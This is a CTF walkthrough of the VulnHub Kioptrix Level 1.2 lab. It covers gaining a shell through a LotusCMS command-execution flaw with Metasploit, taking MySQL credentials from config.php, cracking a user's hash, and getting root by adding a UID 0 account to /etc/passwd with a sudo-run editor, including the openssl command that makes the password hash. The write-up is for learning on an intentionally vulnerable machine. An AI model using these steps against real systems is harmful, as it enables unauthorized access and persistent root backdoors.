CTF Walkthroughs, VulnHub

VulnHub – Kioptrix: Level 1.2 Walkthrough

April 2, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Linux box that involved exploiting a remote command execution vulnerability in the LotusCMS web application to gain initial access, cracking a MySQL user’s hash to gain user access, and exploiting a text editor set to run with Sudo permissions to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -oA to save the output in all formats available

The scan has revealed port 80 (HTTP) and 22 (SSH) are open, so the next step is to enumerate the web server.

Enumerating HTTP

When accessing the web server via a browser, the following page is displayed:

Looking at the source code of the index.php page, nothing too interesting stands out although it does mention “LotusCMS”, which is an open-source web application:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -k to skip TLS certificate verification
  • -u to specify the target URL
  • -w to specify the word list to use

This has not identified anything useful other than the /phpmyadmin directory.

Performing a Nikto scan against the web application, this has not identified anything useful:

When looking for known vulnerabilities in LotusCMS, the following came up, from Exploit DB:

It seems to be a remote command execution vulnerability that can be easily exploited through a Metasploit module.

Exploiting Remote Command Execution

Starting MSFconsole, searching and selecting the LotusCMS exploit, setting and running the exploit:

  • RHOST to specify the target host IP address
  • URI to specify the URL to one of the web application’s pages

This has granted a Meterpreter shell as the www-data user.

Privilege Escalation

When enumerating the files in users’ home directories, the BASH history for the “loneferret” user seems to contain an unusual”sudo ht” entry:

This could be used to escalate privileges as the BASH history indicates how it can be run using Sudo. When viewing the contents of the CompanyPolicy.README file, this contains more information about this command, apparently, it is an editing software used by the organization:

Upon doing some research, it looks like HT is a file viewer, editor, and analyzer for text, binary, and (especially) executable files. Unfortunately, this cannot be executed as www-data, so escalating privileges will be necessary to investigate further. The next step would be to look for database credentials since the www-data user has control over all of the web server files. Looking for the “config.php” file, which usually contains MySQL credentials:

Found the password for the MySQL “root” user. Since PHPMyAdmin is available, it should be fairly trivial to access the database. Logged into PHPMyAdmin and identified the password hash for the loneferret user:

Using the hashes.org online hash cracking/lookup tool to identify the clear-text password:

Logging into the box via SSH as loneferret using the newly discovered password. Attempting to execute the “sudo ht” command, but receiving an error related to the colors used in the terminal:

After running the following command to fix the issue with the terminal, the command can then be run:

export TERM=xterm

Since the HT Editor is running as root, this means the current user can edit just about any file on the file system. Once way to obtain root access is to add an extra line to the /etc/passwd file, which will allow us to add an additional root user to the machine. Running the following command to generate a password hash for the password “pass123” for the new user:

openssl passwd -1 -salt user3 pass123

Editing the /etc/passwd file with the HT Editor and adding an extra line for the “user3” user, making sure to allocate a user ID of “0”, so that the system will treat it as a root user and to add the previously generated hash instead of the “x” so that it will allow to login as that user with a password of “pass123”:

Logging in as the “user3” user via SSH:

This has granted root access to the machine, as the UID of the new user is 0 (root).

Conclusion

The exploitation part of this machine was quite trivial although I quite enjoyed the privilege escalation as it involved a text editor I had never seen before, and shows just how dangerous it can be to allow regular users to edit files as root, as it will pretty much always grant full system access to a potential attacker.